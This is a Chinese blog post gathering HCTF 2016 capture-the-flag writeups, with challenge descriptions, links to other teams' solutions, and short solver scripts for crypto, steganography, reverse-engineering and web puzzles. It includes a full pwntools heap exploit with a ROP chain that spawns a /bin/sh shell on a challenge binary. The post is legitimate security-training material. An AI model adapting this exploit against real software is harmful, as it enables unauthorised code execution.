HCTF Writeup

0

综合各战队和官方的wp…

官方writeup:

http://www.freebuf.com/articles/web/121778.html

FlappyPig的writeup:

http://bobao.360.cn/ctf/detail/179.html

l3m0n师傅的web writeup:

http://www.cnblogs.com/iamstudy/articles/2016_hctf_web_writeup.html

Level-1

62pt-RE-web

题目描述:
—我是个有理想的人,我就是去做Web也不做逆向!—逆向真好玩真好玩 http://139.224.54.27/yixyi/Re50.exe

10pt-MISC-杂项签到

题目描述:
你竟然背着我干……

http://139.224.54.27/webco1a/+_+.pcapng

用wireshark分析pcapng,发现一段base64编码的字符串和一个python脚本,如下利用:

#!/usr/bin/env python
# coding:utf-8

from Crypto import Random
from Crypto.Cipher import AES

import sys
import base64


def decrypt(encrypted, passphrase):
    IV = encrypted[:16]
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(encrypted[16:])


def encrypt(message, passphrase):
    IV = message[:16]
    length = 16
    count = len(message)
    padding = length - (count % length)
    message = message + '\0' * padding
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)


IV = 'YUFHJKVWEASDGQDH'
message = IV + 'flag is hctf{xxxxxxxxxxxxxxx}'

encode_string = 'mbZoEMrhAO0WWeugNjqNw3U6Tt2C+rwpgpbdWRZgfQI3MAh0sZ9qjnziUKkV90XhAOkIs/OXoYVw5uQDjVvgNA=='
flag = decrypt(base64.decodestring(encode_string), 'Qq4wdrhhyEWe4qBF') 

print flag

10pt-Web-2099年的flag

题目描述:
only ios99 can get flag(Maybe you can easily get the flag in 2099
http://2099.hctf.io/

构造User-Agent如下:
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 99_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25

86pt-Web-encore time

谢谢良心主办方最后放出这题,看到Google上VPN填完问卷得到flag。

Level-2

34pt-Web-RESTFUL

题目描述:
博丽神社赛钱箱
http://jinja.hctf.io/

Burpsuite改包PUT index.php/money/123456

94pt-MISC-pic again

题目描述:
教练,我想打CTF
http://139.224.54.27/fl4g/flag.png

# coding: utf-8
from PIL import Image


fflag = open("justastart.zip","rb")
flag = []

while True:
	byte = fflag.read(1)
	if byte == "":
		break
	else:
		hexstr = "%s" % byte.encode("hex")
		decnum = int(hexstr, 16)
		binnum = bin(int(hexstr, 16))[2:].zfill(8)

		for i in xrange(8):
			flag.append(binnum[i:i+1])

flag.reverse()

im = Image.open('misc1.jpg')


width = im.size[0]
height = im.size[1]

pic = Image.new("RGB",im.size)

for y in xrange(height):
	for x in xrange(width):

		pixel = list(im.getpixel((x, y)))

		for i in xrange(3):
			count = pixel[i]%2

			if len(flag) == 0:
				break

			if count == int(flag.pop()):
				continue

			if count == 0:
				pixel[i]+=1

			elif count == 1:
				pixel[i]-=1

		pic.putpixel([x, y],tuple(pixel))

pic.save("flag.png")
# coding: utf-8
from PIL import Image

im = Image.open('flag.png')


width = im.size[0]
height = im.size[1]

a = ""
aa = ""

for y in xrange(height):
	for x in xrange(width):

		pixel = im.getpixel((x, y))

		for i in xrange(3):
			aa += str(pixel[i]%2)

for i in xrange(len(aa)):
	try:
		a += chr(int(aa[i*8:i*8+8],2))
	except:
		break

fflag = open("test.zip","w")

fflag.write(a)
fflag.close()

124pt-Web-giligili

题目描述:
ギリギリEYEo(^▽^)┛ url
http://re4js.hctf.io/

出题人给的官方writeup:

http://lorexxar.cn/2016/11/19/web2-giligili/

250pt-MISC-你们所知道的隐写就仅此而已吗→_→

题目描述:
通信小学弟10分钟就做出来了
http://139.224.54.27/Shimakaze/shimakaze.bmp

这题是个把信息隐写在频域的做法。 所以,正经做法很简单,只要三行代码——读图、FFT、显示就行了。参考如下(Matlab):

IM = imread('shimakaze.bmp');
IM_FFT = fft(IM);
imshow(real(uint8(IM_FFT)));

hctf-matlab-wave

48pt-MISC-gogogo

题目描述:
上上下下左左右右baba
http://139.224.54.27/gogogo/hundouluo.nes

开金手指通关拿到flag。

127pt-RE-前年的400分

题目描述:
熟悉的套路,时代的眼泪

http://139.224.54.27/e165421110ba03099a1c0393373c5b43/

逆向分析得到一个二十二元一次方程组,写脚本计算之,对22个解四舍五入取整,然后转ascii得到flag。

#!/usr/bin/python
from sympy import *
import sys
a = Matrix([
	[8923,659,1303,1949,4447,3527,757,367,5507,7907,691,
	9629,5303,8117,9103,9391,89,3361,751,9067,5417,6829],
	[9067,1259,107,8597,4229,1213,8831,3259,269,5323,769,
	1237,5501,6763,8053,67,3163,3863,4447,5569,4357,5503],
	[9533,23,1973,8269,6961,8929,6301,2791,4861,8053,1609,
	8219,911,7583,6143,2953,7247,6131,7853,4451,7187,8629],
	[1039,389,1487,5987,937,239,3583,2897,8893,3307,7459,
	8521,9769,9689,6959,7949,9137,3461,4229,9059,7177,7643],
	[7853,6271,9371,1613,73,8243,9013,919,5387,2207,6211,
	139,5077,7211,2053,8443,4421,5717,8779,8971,6337,7159],
	[3019,8377,1613,1973,3923,8821,797,4969,7643,7297,2381,
	4679,5869,647,7411,3329,6199,7349,4969,8731,877,1039],
	[3089,9859,7159,227,271,8161,1051,5701,1259,1361,3673,
	8311,4679,7877,2621,991,9949,683,743,6079,2473,4519],
	[1259,4651,5479,4951,4657,4591,509,3821,6661,4127,2011,
	4547,7621,5261,5261,2003,4871,457,2083,4561,6947,1187],
	[4703,9629,3769,2003,1297,4283,2381,8429,7057,9371,4483,
	4099,1873,499,7583,5897,937,727,241,4799,6361,5531],
	[283,5591,151,2113,7229,307,3851,8963,2777,7757,8831,
	17,8563,1543,8243,3529,3833,2411,2897,19,3559,853],
	[9467,2207,2269,2083,7741,5801,2633,349,9257,479,331,
	7649,5393,887,6329,4243,3329,7121,4001,6043,8263,3253],
	[4993,7577,6833,661,4129,67,2791,3121,4597,8053,8147,
	1619,5801,6173,127,8179,8093,9319,1063,9157,7817,2341],
	[1493,9137,9787,617,5557,8387,4219,3301,251,3203,8443,
	2521,2887,2437,7883,5653,3907,4457,9091,523,887,8101],
	[9467,2251,9067,4153,557,4999,5669,9343,7949,7019,113,
	1801,1867,1187,3541,5527,2347,4813,3019,683,6869,5051],
	[7333,8677,3557,4099,5279,449,2099,8929,5383,1933,9157,
	6827,467,3299,443,3739,823,7499,691,2467,281,4049],
	[7489,739,9769,7963,5651,7691,947,8537,4943,1187,4651,
	9011,6359,1063,7541,9187,2551,7649,4001,3187,6199,7433],
	[5653,9349,9419,2459,2423,1823,1291,2423,3671,4673,1033,
	8389,2777,8629,6203,6673,1877,7583,5077,9227,6037,2339],
	[1663,3529,9631,6833,17,3697,4327,6053,7639,6679,797,
	3209,3191,3259,5563,5717,3181,1571,751,1163,211,4421],
	[2273,9341,8081,9311,41,4241,1279,4483,6581,6863,7583,
	4129,1543,5651,4357,9521,5557,11,7723,2441,6733,6521],
	[1171,241,9851,3583,1609,43,9281,5867,2819,5659,4493,
	223,2767,3221,6173,6947,5897,6113,6737,3989,9733,3467],
	[173,2099,2953,7243,4987,1723,2657,1213,2731,7507,
	9721,4637,9203,5407,3169,5003,8681,2,3329,5843,8017,83],
	[5119,3109,8369,7993,2927,127,5233,4783,5171,3907,1613,
	4567,3343,2617,5387,8713,7829,3559,419,9931,6067,4481]])
b = Matrix([[8667403],[7382511],[11146615],[10158207],[10479787],
	[8313243],[8299033],[7413565],[8125855],[6859047],[8439587],
	[9391249],[9589403],[8408927],[8494969],[11322819],[9463133],
	[7296675],[10556993],[8201527],[8114019],[9027821]])
v = symarray('v', 22)
dict = solve(a*v-b)
for i in range(22):
	sys.stdout.write(chr(int(round(dict[v[i]]))))

117pt-Web-兵者多诡

题目描述:
请尽可能发现更多,不要放过你所看到的
http://pics.hctf.io/home.php?key=hduisa123

289pt-Crypto-Crypto So Interesting

题目描述:
[]~( ̄▽ ̄)~* 120.27.4.96 12000
http://139.224.54.27/03c880e4aaa75efb2200c22e5dcd996d/rsa1.py

316pt-PWN-就是干

题目描述:
要啥背景,就是怼 115.28.78.54 80
http://139.224.54.27/fafafafafafa/

#! /usr/bin/python
from pwn import *
context.log_level = 'debug'
target = process('pwn-f')
def create(size, string):
	target.recvuntil('quit')
	target.sendline('create ')
	target.recvuntil('size:')
	target.sendline(str(size))
	target.recvuntil('str:')
	target.send(string)
def delete(id):
	target.recvuntil('quit')
	target.sendline('delete ')
	target.recvuntil('id:')
	target.sendline(str(id))
	target.recvuntil('sure?:')
	target.sendline('yes')
create(4, 'aaa\n')
create(4, 'aaa\n')
delete(0)
delete(1)
delete(0)
create(4, '\x00')
create(0x20, 'a' * 0x16 + 'lo' + '\x2d\x00')
delete(0)
target.recvuntil('lo')
addr = target.recvline()
addr = addr[:-1]
addr = u64(addr + '\x00' * (8 - len(addr))) - 0xd2d
delete(1)
create(4, '\x00')
target.recvuntil('quit')
target.sendline('create ')
target.recvuntil('size:')
target.sendline(str(0x20))
target.recvuntil('str:')
target.send('a' * 0x18 + p64(0x00000000000011DC + addr))
print hex(addr)
target.recvuntil('quit')
target.sendline('delete ')
target.recvuntil('id:')
target.sendline('1')
target.recvuntil('sure?:')
ropchain = p64(addr + 0x00000000000011e3) # pop rdi
ropchain += p64(addr + 0x202070)# got@malloc
ropchain += p64(addr + 0x0000000000000990)# plt@put
ropchain += p64(addr + 0x00000000000011e3)# pop rdi
ropchain += p64(1)
ropchain += p64(addr + 0x00000000000011DA)# magic
ropchain += p64(0)# rbx
ropchain += p64(1)# rbp
ropchain += p64(addr + 0x0000000000202058)# r12 -> rip got@read
ropchain += p64(8)# r13 -> rdx
ropchain += p64(addr + 0x0000000000202078)# r14 -> rsi got@atoi
ropchain += p64(0)# r15 -> rdi
ropchain += p64(addr + 0x00000000000011C0)# magic
ropchain += 'a'*8*7
ropchain += p64(addr + 0x0000000000000B65)# getInt
target.sendline('yes ' + ropchain)
addr = target.recvline()[:-1]
addr = u64(addr + '\x00' * (8 - len(addr)))
#addr = addr - 534112 + 288144
addr = addr - 537984 + 283536
print hex(addr)
target.sendline(p64(addr)+'/bin/sh')
target.interactive()

Level-3

必须比香港记者还要快

题目描述:
url http://changelog.hctf.io/

guestbook

题目描述:
just a guestbook url http://guestbook.hctf.io/

Crypto So Cool

题目描述:
120.27.4.96 13000 – ( ゜- ゜)つロ http://139.224.54.27/0514b6fdaa863addd7dbb15c2052cb3ae6755c4a/rsa2.py

出题人失踪了

题目描述:
出题人部署完成题目后被带走了,连binary都没来得及给
115.28.78.54 13455

官方出处:

http://www.scs.stanford.edu/brop/

asm

题目描述:
汇编入门测试 115.28.78.54 23333 http://139.224.54.27/asm/asm.tar

点我点我, 我是最正常的逆向题

题目描述:
把大象放进冰箱需要3步,那么做出一道题目需要几步呢?
http://139.224.54.27/Re200/

48小时如何快速精通 C++

题目描述:
别想了,那怎么可能?
http://139.224.54.27/mastercpp/main.cpp

大图书馆的牧羊人

题目描述:
url 你喜欢看书吗? 来分享你喜欢的书吧。 (本站资源仅供展示使用,侵删,下载后请于24小时内解决) http://library.hctf.io/

secret area

题目描述:
总有一些secret area你还没有发现
http://sguestbook.hctf.io/

web选手的自我修养

题目描述:
新搭的wp居然爆了漏洞,真气,漏洞修复了却被安了后门,你能找到后门在哪吗???提供压缩包为docker镜像
https://mega.nz/#!xcFWXBwb!XXQCihmJiedqDbNKAaxkKNiBNAqflt9s2hbls71_b7I

flip

题目描述:
简单的小游戏~
http://139.224.54.27/flip/

AT field

题目描述:
Welcome to AT field http://atfield.hctf.io

Crypto So Amazing

题目描述:
120.27.4.96 14000 ∑^)/ http://139.224.54.27/c4248304a16c19793e4250eaab44f85a22a7c4bb/rsa3.py

二进制选手的自我修养

题目描述:
蛤,二进制 115.28.78.54 13455 http://139.224.54.27/weber/

官方正解:

https://en.wikipedia.org/wiki/Padding_oracle_attack

你没走过的套路

题目描述:
Pentest 120.27.122.0

5-days

题目描述:
5-days to pwn:d 115.28.78.54 12345 http://139.224.54.27/5-days/5-days.tar

AT field-2

题目描述:
Welcome to AT field http://atfield.hctf.io

魔法禁书目录

题目描述:
风雨再临 卷土重来
http://index-librorum-prohibitorum.hctf.io/

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号